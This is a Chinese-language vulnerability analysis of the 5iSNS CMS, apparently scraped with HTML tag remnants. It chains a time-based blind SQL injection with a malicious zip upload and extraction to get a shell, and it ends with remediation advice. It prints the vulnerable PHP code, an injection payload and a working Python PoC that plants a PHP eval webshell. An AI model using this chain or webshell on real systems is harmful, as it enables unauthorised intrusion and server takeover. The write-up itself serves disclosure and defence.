5iSNS CMS组合漏洞分析：从SQL注入到Getshell<\/h1>

漏洞概述<\/h2>

本文分析5iSNS内容付费系统存在的组合漏洞，通过SQL注入获取数据库信息，结合文件上传功能实现最终Getshell。该漏洞利用链包含三个关键环节：<\/p>

SQL注入漏洞获取数据库中的压缩包信息<\/li>
文件上传功能上传恶意压缩包<\/li>

解压缩功能触发恶意文件执行<\/li> <\/ol>

漏洞分析<\/h2>

1. SQL注入漏洞<\/h3>

漏洞位置<\/strong>：5isns\/basephp\/func\/db.func.php<\/code>中的db_cond_to_sqladd<\/code>函数<\/p>

漏洞原理<\/strong>：<\/p>

系统使用PDO但未完全实现预编译<\/li> 当传入数组参数时（如id[test]=1<\/code>），会进入特殊处理分支<\/li> 攻击者可控制SQL语句中的操作符部分<\/li> <\/ul> 关键代码<\/strong>：<\/p> function<\/span> db_cond_to_sqladd<\/span>($cond) { <\/span><\/span> $s =<\/span> ''<\/span>; <\/span><\/span> if<\/span>(!<\/span>empty<\/span>($cond)) { <\/span><\/span> $s =<\/span> ' WHERE '<\/span>; <\/span><\/span> foreach<\/span>($cond as<\/span> $k=><\/span>$v) { <\/span><\/span> if<\/span>(!<\/span>is_array<\/span>($v)) { <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> } else<\/span> { <\/span><\/span> foreach<\/span>($v as<\/span> $k1=><\/span>$v1) { <\/span><\/span> $v1 =<\/span> (is_int<\/span>($v1) ||<\/span> is_float<\/span>($v1)) ?<\/span> $v1 :<\/span> "'"<\/span>.<\/span>addslashes<\/span>($v1).<\/span>"'"<\/span>; <\/span><\/span> if<\/span>(strrpos<\/span>($k,'CONCAT'<\/span>)!==<\/span>false<\/span>){ <\/span><\/span> $s .=<\/span> "<\/span>$k$k1$v1<\/span> AND "<\/span>; <\/span><\/span> }else<\/span>{ <\/span><\/span> $s .=<\/span> "`<\/span>$k<\/span>`<\/span>$k1$v1<\/span> AND "<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> $s =<\/span> substr<\/span>($s, 0<\/span>, -<\/span>4<\/span>); <\/span><\/span> } <\/span><\/span> return<\/span> $s; <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> 构造形如val[ and if(ascii(substr((select sha1 from 5isns_file where name in (0x...)),1,1)) in (97),sleep(3),0)--+]=1<\/code>的请求<\/li> 通过时间盲注获取数据库中的敏感信息（如sha1值和文件名）<\/li> <\/ul> 2. 文件上传功能<\/h3> 上传路径<\/strong>：<\/p> 压缩包默认上传到$conf['upload_path'].'attach\/'<\/code>目录<\/li> 文档上传到$conf['upload_path'].'docview\/'<\/code>目录<\/li> <\/ul> 限制条件<\/strong>：<\/p> 只能上传压缩包格式文件<\/li> 文档上传后需要管理员审核，但信息已存入数据库<\/li> <\/ul> 3. 漏洞组合利用<\/h3> 关键代码位置<\/strong>：5isns\/app\/index\/controller\/doc.php<\/code>中的upload操作<\/p> 利用流程<\/strong>：<\/p> 通过SQL注入获取数据库中存储的sha1值和文件名<\/li> 构造同名恶意压缩包（包含webshell）<\/li> 利用上传接口将恶意压缩包上传到docview目录<\/li> 触发解压缩操作执行恶意代码<\/li> <\/ol> 解压缩关键代码<\/strong>：<\/p> $info =<\/span> db_find_one<\/span>('doccon'<\/span>,array<\/span>('sha1'<\/span>=><\/span>$data['sha1'<\/span>])); <\/span><\/span>$fileinfo =<\/span> db_find_one<\/span>('file'<\/span>,array<\/span>('id'<\/span>=><\/span>$info['fileid'<\/span>])); <\/span><\/span>$name =<\/span> str_replace<\/span>('.'<\/span>.<\/span>$fileinfo['ext'<\/span>],''<\/span>,$fileinfo['savename'<\/span>]); <\/span><\/span>xn_unzip<\/span>($conf['upload_path'<\/span>].<\/span>'docview\/'<\/span>.<\/span>$name.<\/span>'.zip'<\/span>, $conf['upload_path'<\/span>].<\/span>'docview\/'<\/span>.<\/span>$name.<\/span>'\/'<\/span>); <\/span><\/span><\/code><\/pre>绕过条件<\/strong>：<\/p> 时间限制：$time-intval($time1)>60<\/code> - 通过设置足够大的time参数绕过<\/li> 文件存在检查：!file_exists($tmpurl)<\/code> - 每次使用不同的文件名<\/li> 文件移动：move_uploaded_file<\/code>将文件写入docview目录<\/li> 数据库查询：通过注入获取的sha1值查询对应文件名<\/li> <\/ol> 漏洞利用PoC<\/h2> def<\/span> get_sha1<\/span>(root_url,hex_title,payload,headers): <\/span><\/span> sha1 =<\/span> ''<\/span> <\/span><\/span> for<\/span> i in<\/span> xrange(1<\/span>,33<\/span>): <\/span><\/span> for<\/span> x in<\/span> payload: <\/span><\/span> param =<\/span> "?val[ and if(ascii(substr((select sha1 from 5isns_file where name in (<\/span>%s<\/span>)),<\/span>%s<\/span>,1)) in (<\/span>%d<\/span>),sleep(3),0)--+]=1"<\/span> %<\/span> (hex_title,i,ord(x)) <\/span><\/span> url =<\/span> root_url +<\/span> '\/api-focus'<\/span> +<\/span> param <\/span><\/span> start_time =<\/span> time.<\/span>time() <\/span><\/span> s =<\/span> requests.<\/span>get(url=<\/span>url) <\/span><\/span> end_time =<\/span> time.<\/span>time() <\/span><\/span> if<\/span> end_time -<\/span> start_time ><\/span> 2<\/span>: <\/span><\/span> sha1 +=<\/span> x <\/span><\/span> break<\/span> <\/span><\/span> return<\/span> sha1 <\/span><\/span> <\/span><\/span>def<\/span> upload_shell_dir<\/span>(root_url,sha1,shell_dir): <\/span><\/span> filename =<\/span> shell_dir +<\/span> '.zip'<\/span> <\/span><\/span> cmd =<\/span> 'echo "<?php @eval($_POST[1]);?>" > shell.php && zip <\/span>%s<\/span> shell.php'<\/span> %<\/span> filename <\/span><\/span> os.<\/span>system(cmd) <\/span><\/span> <\/span><\/span> exp_url =<\/span> root_url +<\/span> '\/doc-upload?time=<\/span>%s<\/span>&sha1=<\/span>%s<\/span>'<\/span> %<\/span> ('159999999999'<\/span>,sha1) <\/span><\/span> files =<\/span> { <\/span><\/span> "file"<\/span>:open(filename,'rb'<\/span>), <\/span><\/span> "file_name"<\/span>:(None<\/span>,"testssss"<\/span>) <\/span><\/span> } <\/span><\/span> s =<\/span> requests.<\/span>post(url=<\/span>exp_url,files=<\/span>files) <\/span><\/span> <\/span><\/span> shell_url =<\/span> root_url +<\/span> '\/upload\/docview\/'<\/span> +<\/span> shell_dir +<\/span> '\/shell.php'<\/span> <\/span><\/span> data =<\/span> {'1'<\/span>:'phpinfo();'<\/span>} <\/span><\/span> s =<\/span> requests.<\/span>post(url=<\/span>shell_url,data=<\/span>data) <\/span><\/span> if<\/span> 'phpinfo'<\/span> in<\/span> s.<\/span>text: <\/span><\/span> print shell_url <\/span><\/span><\/code><\/pre>修复建议<\/h2> SQL注入修复<\/strong>：<\/p> 完全使用PDO预编译语句<\/li> 对用户输入进行严格过滤<\/li> 移除db_cond_to_sqladd<\/code>函数中的动态SQL拼接<\/li> <\/ul> <\/li> 文件上传修复<\/strong>：<\/p> 对上传文件进行严格的内容检查<\/li> 解压缩前验证文件完整性<\/li> 限制解压缩目录不可执行PHP文件<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 加强后台管理权限验证<\/li> 实现上传文件与解压缩操作的权限分离<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 该漏洞利用链展示了如何通过组合多个看似独立的漏洞实现最终攻击目标。开发人员应当注意：<\/p> 不要信任任何用户输入<\/li> 安全功能实现要完整（如PDO预编译）<\/li> 文件操作要设置严格的权限和验证机制<\/li> 关键操作（如解压缩）要有安全审计<\/li> <\/ul>